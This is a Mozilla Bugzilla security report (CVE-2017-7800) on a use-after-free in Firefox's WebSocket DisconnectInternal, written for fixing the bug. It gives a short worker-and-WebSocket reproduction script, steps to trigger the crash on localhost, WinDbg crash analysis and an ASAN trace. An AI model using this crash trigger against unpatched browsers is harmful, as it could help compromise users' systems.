Bug 1374047 (CVE-2017-7800)

WebSocket - Use After Free in WebSocketImpl::DisconnectInternal()

RESOLVED FIXED in Firefox -esr52

Status

()

--
critical
RESOLVED FIXED
2 years ago
11 days ago

People

(Reporter: loobenyang, Assigned: baku)

Tracking

(4 keywords)

54 Branch
mozilla56
Unspecified
All
crash, csectype-uaf, sec-critical, testcase
Points:
---
Bug Flags:
sec-bounty +
qe-verify -

Firefox Tracking Flags

(firefox-esr5255+ fixed, firefox54 wontfix, firefox55+ fixed, firefox56+ fixed)

Details

(Whiteboard: [adv-main55+][adv-esr52.3+])

Attachments

(4 attachments, 1 obsolete attachment)

(Reporter)

Description

2 years ago
Reproduction test case (whole server code in attached file UAF_DisconnectInternal_Repro.js):

	Main page code:
		<script>
		var worker0 = new Worker("worker0.js");
		setTimeout(function(){ worker0.terminate();}, 200);
		setTimeout(function(){location.reload()},200);
		</script>
	Worker code:
		new WebSocket("ws://localhost:12345/", "wsm1-protocol");;
		
Steps to reproduce: 
	1. Run server side script UAF_DisconnectInternal_Repro.js with Node.js (node UAF_DisconnectInternal_Repro.js).
	2. Enter http://localhost:12345 in Firefox browser.

Firefox version: 54.0 (32-bit)
OS: Windows 10

Stack trace:


	(16a8.30b4): Access violation - code c0000005 (!!! second chance !!!)
	eax=00000000 ebx=18d77028 ecx=18d77028 edx=e5e5e5e5 esi=67d4b030 edi=18d76f80
	eip=65f98e0c esp=0117f1cc ebp=0117f1cc iopl=0         nv up ei ng nz na po nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
	xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release [inlined in xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12]:
	65f98e0c 8b02            mov     eax,dword ptr [edx]  ds:002b:e5e5e5e5=????????
	0:000> !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************


	FAULTING_IP: 
	xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
	65f98e0c 8b02            mov     eax,dword ptr [edx]

	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 65f98e0c (xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: e5e5e5e5
	Attempt to read from address e5e5e5e5

	FAULTING_THREAD:  000030b4

	PROCESS_NAME:  firefox.exe

	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

	EXCEPTION_CODE_STR:  c0000005

	EXCEPTION_PARAMETER1:  00000000

	EXCEPTION_PARAMETER2:  e5e5e5e5

	FOLLOWUP_IP: 
	xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
	65f98e0c 8b02            mov     eax,dword ptr [edx]

	READ_ADDRESS:  e5e5e5e5 

	WATSON_BKT_PROCSTAMP:  59399e7c

	WATSON_BKT_PROCVER:  54.0.0.6368

	PROCESS_VER_PRODUCT:  Firefox

	WATSON_BKT_MODULE:  xul.dll

	WATSON_BKT_MODSTAMP:  5939a290

	WATSON_BKT_MODOFFSET:  88e0c

	WATSON_BKT_MODVER:  54.0.0.6368

	MODULE_VER_PRODUCT:  Firefox

	BUILD_VERSION_STRING:  10.0.15063.296 (WinBuild.160101.0800)

	MODLIST_WITH_TSCHKSUM_HASH:  6677a630c80a09dae24ad5f75ef967a3823bc5ff

	MODLIST_SHA1_HASH:  d474cec995c2004a6ffece945bcd0a3e7837f453

	NTGLOBALFLAG:  70

	PROCESS_BAM_CURRENT_THROTTLED: 0

	PROCESS_BAM_PREVIOUS_THROTTLED: 0

	APPLICATION_VERIFIER_FLAGS:  0

	PRODUCT_TYPE:  1

	SUITE_MASK:  784

	DUMP_TYPE:  fe

	ANALYSIS_SESSION_TIME:  06-18-2017 22:32:19.0170

	ANALYSIS_VERSION: 10.0.15063.400 x86fre

	THREAD_ATTRIBUTES: 
	OS_LOCALE:  ENA

	PROBLEM_CLASSES: 

		ID:     [0n292]
		Type:   [@ACCESS_VIOLATION]
		Class:  Addendum
		Scope:  BUCKET_ID
		Name:   Omit
		Data:   Omit
		PID:    [Unspecified]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef

		ID:     [0n264]
		Type:   [INVALID_POINTER_READ]
		Class:  Primary
		Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
				BUCKET_ID
		Name:   Add
		Data:   Omit
		PID:    [Unspecified]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef

		ID:     [0n94]
		Type:   [FILL_PATTERN]
		Class:  Addendum
		Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
				BUCKET_ID
		Name:   Add
		Data:   Add
				String: [e5e5e5e5]
		PID:    [0x16a8]
		TID:    [0x30b4]
		Frame:  [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef

	BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5

	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5

	PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

	LAST_CONTROL_TRANSFER:  from 66cb658b to 65f98e0c

	STACK_TEXT:  
	0117f1cc 66cb658b 00000000 00000000 16daeee0 xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12
	0117f1fc 66cba1d4 6620c149 15ac8ec0 15ac8ef4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
	0117f200 6620c149 15ac8ec0 15ac8ef4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
	0117f214 6620c109 16daeee0 13981380 139813b4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
	0117f23c 6620c08d 0117f26c 6620c109 180ec050 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	0117f244 6620c109 180ec050 0b1f5864 180ec060 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
	0117f26c 6620c08d 0117f2e4 6601f80e 180ec060 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	0117f274 6601f80e 180ec060 03127170 03127160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
	0117f2e4 66020701 03104200 00000000 0117f317 xul!nsThread::ProcessNextEvent+0x213
	0117f318 66068ea0 03125060 60944f31 0b1f5860 xul!mozilla::ipc::MessagePump::Run+0x72
	0117f350 66068e6f 03104200 00000001 0b1f5800 xul!MessageLoop::RunHandler+0x20
	0117f370 662d19d8 0b1f7640 00000000 0117f390 xul!MessageLoop::Run+0x19
	0117f380 662d1767 0b1f5860 0b1f7640 0117f3a4 xul!nsBaseAppShell::Run+0x34
	0117f390 662d171c 0b1f5860 0117f6f5 0c30a440 xul!nsAppShell::Run+0x26
	0117f3a4 66505f9e 0b1f7640 0117f5f8 0117f610 xul!nsAppStartup::Run+0x22
	0117f598 665069d0 03103050 0117f740 00000001 xul!XREMain::XRE_mainRun+0xa92
	0117f5d4 6658b805 00000000 0117f610 0017f740 xul!XREMain::XRE_main+0x37b
	0117f700 6658b7c7 0117f740 0117fa84 01321bdd xul!XRE_main+0x39
	0117f70c 01321bdd 00000001 03103050 0117f740 xul!mozilla::BootstrapImpl::XRE_main+0x11
	0117fa84 01325b7f 00000001 fe615d08 01718b50 firefox!wmain+0x65d
	0117facc 73b48744 00ee0000 73b48720 7b9e292a firefox!__scrt_common_main_seh+0xf9
	0117fae0 770a587d 00ee0000 7f378ec4 00000000 KERNEL32!BaseThreadInitThunk+0x24
	0117fb28 770a584d ffffffff 770c6344 00000000 ntdll!__RtlUserThreadStart+0x2f
	0117fb38 00000000 01325bf5 00ee0000 00000000 ntdll!_RtlUserThreadStart+0x1b


	THREAD_SHA1_HASH_MOD_FUNC:  c69ed9af77e0e3ae8946fbf3e674aa21f178e624

	THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  b2a6a3a18b4b25d90fe64452661d0eb068d1731a

	THREAD_SHA1_HASH_MOD:  1e517827cf137402b6881f2d4a04f0647425c5be

	FAULT_INSTR_CODE:  ff52028b

	FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h

	FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h

	FAULTING_SOURCE_LINE_NUMBER:  65

	SYMBOL_STACK_INDEX:  0

	SYMBOL_NAME:  xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12

	FOLLOWUP_NAME:  MachineOwner

	MODULE_NAME: xul

	IMAGE_NAME:  xul.dll

	DEBUG_FLR_IMAGE_TIMESTAMP:  5939a290

	STACK_COMMAND:  ~0s ; kb

	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_c0000005_xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_xul!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef+12

	FAILURE_EXCEPTION_CODE:  c0000005

	FAILURE_IMAGE_NAME:  xul.dll

	BUCKET_ID_IMAGE_STR:  xul.dll

	FAILURE_MODULE_NAME:  xul

	BUCKET_ID_MODULE_STR:  xul

	FAILURE_FUNCTION_NAME:  RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	BUCKET_ID_FUNCTION_STR:  RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	BUCKET_ID_OFFSET:  12

	BUCKET_ID_MODTIMEDATESTAMP:  5939a290

	BUCKET_ID_MODCHECKSUM:  31298a4

	BUCKET_ID_MODVER_STR:  54.0.0.6368

	BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_

	FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

	FAILURE_SYMBOL_NAME:  xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef

	WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/firefox.exe/54.0.0.6368/59399e7c/xul.dll/54.0.0.6368/5939a290/c0000005/00088e0c.htm?Retriage=1

	TARGET_TIME:  2017-06-18T10:33:04.000Z

	OSBUILD:  15063

	OSSERVICEPACK:  296

	SERVICEPACK_NUMBER: 0

	OS_REVISION: 0

	OSPLATFORM_TYPE:  x86

	OSNAME:  Windows 10

	OSEDITION:  Windows 10 WinNt SingleUserTS Personal

	USER_LCID:  0

	OSBUILD_TIMESTAMP:  unknown_date

	BUILDDATESTAMP_STR:  160101.0800

	BUILDLAB_STR:  WinBuild

	BUILDOSVER_STR:  10.0.15063.296

	ANALYSIS_SESSION_ELAPSED_TIME:  104d4

	ANALYSIS_SOURCE:  UM

	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_fill_pattern_e5e5e5e5_c0000005_xul.dll!refptr_mozilla::edittransactionbase_::assign_assuming_addref

	FAILURE_ID_HASH:  {6bdf5e90-d575-dd3a-0b53-74c46bf9fa98}

	Followup:     MachineOwner
	---------

Variable shows the WebSocketImpl object had been freed:

	0:000> dt this
	Local var @ edi Type mozilla::dom::WebSocketImpl*
	   +0x000 __VFN_table : 0xe5e5e5e5 
	   +0x004 __VFN_table : 0xe5e5e5e5 
	   +0x008 __VFN_table : 0xe5e5e5e5 
	   +0x00c __VFN_table : 0xe5e5e5e5 
	   +0x010 mProxy           : 0xe5e5e5e5 nsWeakReference
	   +0x014 __VFN_table : 0xe5e5e5e5 
	   +0x018 __VFN_table : 0xe5e5e5e5 
	   +0x01c mRefCnt          : mozilla::ThreadSafeAutoRefCnt
	   +0x020 mWebSocket       : RefPtr<mozilla::dom::WebSocket>
	   +0x024 mChannel         : nsCOMPtr<nsIWebSocketChannel>
	   +0x028 mIsServerSide    : ffffffffffffffe5
	   +0x029 mSecure          : ffffffffffffffe5
	   +0x02a mOnCloseScheduled : ffffffffffffffe5
	   +0x02b mFailed          : ffffffffffffffe5
	   +0x02c mDisconnectingOrDisconnected : ffffffffffffffe5
	   +0x02d mCloseEventWasClean : ffffffffffffffe5
	   +0x030 mCloseEventReason : nsString
	   +0x03c mCloseEventCode  : 0xe5e5
	   +0x040 mAsciiHost       : nsCString
	   +0x04c mPort            : 0xe5e5e5e5
	   +0x050 mResource        : nsCString
	   +0x05c mUTF16Origin     : nsString
	   +0x068 mURI             : nsCString
	   +0x074 mRequestedProtocolList : nsCString
	   +0x080 mOriginDocument  : nsCOMPtr<nsIWeakReference>
	   +0x084 mScriptFile      : nsCString
	   +0x090 mScriptLine      : 0xe5e5e5e5
	   +0x094 mScriptColumn    : 0xe5e5e5e5
	   +0x098 mInnerWindowID   : 0xe5e5e5e5`e5e5e5e5
	   +0x0a0 mWorkerPrivate   : 0xe5e5e5e5 mozilla::dom::workers::WorkerPrivate
	   +0x0a4 mWorkerHolder    : nsAutoPtr<mozilla::dom::workers::WorkerHolder>
	   +0x0a8 mWeakLoadGroup   : nsCOMPtr<nsIWeakReference>
	   +0x0ac mIsMainThread    : ffffffffffffffe5
	   +0x0b0 mMutex           : mozilla::Mutex
	   +0x0b4 mWorkerShuttingDown : ffffffffffffffe5
	   +0x0b8 mService         : RefPtr<mozilla::net::WebSocketEventService>
(Reporter)

Comment 1

2 years ago
Ran the same test case in local built Linux ASAN build, it did report a Use After Free:

Firefox version: 56.0a1 (2017-06-17) (64-bit)

=================================================================
==2917==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130000d0388 at pc 0x7f8911403be3 bp 0x7fffcedacf50 sp 0x7fffcedacf48
READ of size 8 at 0x6130000d0388 thread T0 (Web Content)
    #0 0x7f8911403be2 in assign_assuming_AddRef /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27
    #1 0x7f8911403be2 in operator= /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:600
    #2 0x7f8911403be2 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:666
    #3 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
    #4 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
    #5 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #6 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #7 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #8 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #9 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
    #10 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #11 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #12 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
    #13 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #14 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #15 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #16 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
    #17 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
    #18 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #19 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #20 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #21 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
    #22 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #23 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
    #24 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #25 0x41da58 in _start (/home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/bin/firefox+0x41da58)

0x6130000d0388 is located 264 bytes inside of 336-byte region [0x6130000d0280,0x6130000d03d0)
freed by thread T0 (Web Content) here:
    #0 0x4bef80 in __interceptor_cfree.localalias.0 /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:45
    #1 0x7f8911400172 in operator delete /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7f8911400172 in Release /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
    #3 0x7f8911400172 in non-virtual thunk to mozilla::dom::WebSocketImpl::Release() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
    #4 0x7f890e33b4dc in ~nsCOMPtr_base /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:294:7
    #5 0x7f890e33b4dc in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/thecoder/OpenSrc/firefox/netwerk/base/nsLoadGroup.cpp:644
    #6 0x7f8911403952 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:663:5
    #7 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
    #8 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
    #9 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #10 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #11 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
    #12 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #13 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
    #14 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #15 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #16 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
    #17 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #18 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #19 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #20 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
    #21 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
    #22 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #23 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #24 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #25 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
    #26 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #27 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
    #28 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T29 (DOM Worker) here:
    #0 0x4bf108 in __interceptor_malloc /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52
    #1 0x4f72dd in moz_xmalloc /home/thecoder/OpenSrc/firefox/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f8911409473 in operator new /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f8911409473 in WebSocket /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:945
    #4 0x7f8911409473 in mozilla::dom::WebSocket::ConstructorCommon(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::Sequence<nsString> const&, nsITransportProvider*, nsACString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:1287
    #5 0x7f891140b3fe in mozilla::dom::WebSocket::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:986:10
    #6 0x7f89128b2000 in mozilla::dom::WebSocketBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WebSocketBinding.cpp:1073:59
    #7 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
    #8 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
    #9 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
    #10 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
    #11 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
    #12 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
    #13 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
    #14 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
    #15 0x7f891acf3543 in Evaluate(JSContext*, js::ScopeKind, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4719:19
    #16 0x7f891acf3d2f in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4784:12
    #17 0x7f8914a44959 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:1969:10
    #18 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
    #19 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #20 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #21 0x7f8914af0d17 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5874:7
    #22 0x7f89149f2bb2 in Run /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.h:1644:12
    #23 0x7f89149f2bb2 in (anonymous namespace)::LoadAllScripts(mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2127
    #24 0x7f89149f24b5 in mozilla::dom::workers::scriptloader::LoadMainScript(mozilla::dom::workers::WorkerPrivate*, nsAString const&, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2245:3
    #25 0x7f8914b10d0d in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:586:5
    #26 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
    #27 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #28 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #29 0x7f8914aea4f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5118:7
    #30 0x7f8914a36f75 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:2916:9
    #31 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #32 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #33 0x7f890f22d296 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:368:5
    #34 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #35 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #36 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #37 0x7f890e17e7df in nsThread::ThreadFunc(void*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:503:5

Thread T29 (DOM Worker) created by T0 (Web Content) here:
    #0 0x430489 in __interceptor_pthread_create /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:243
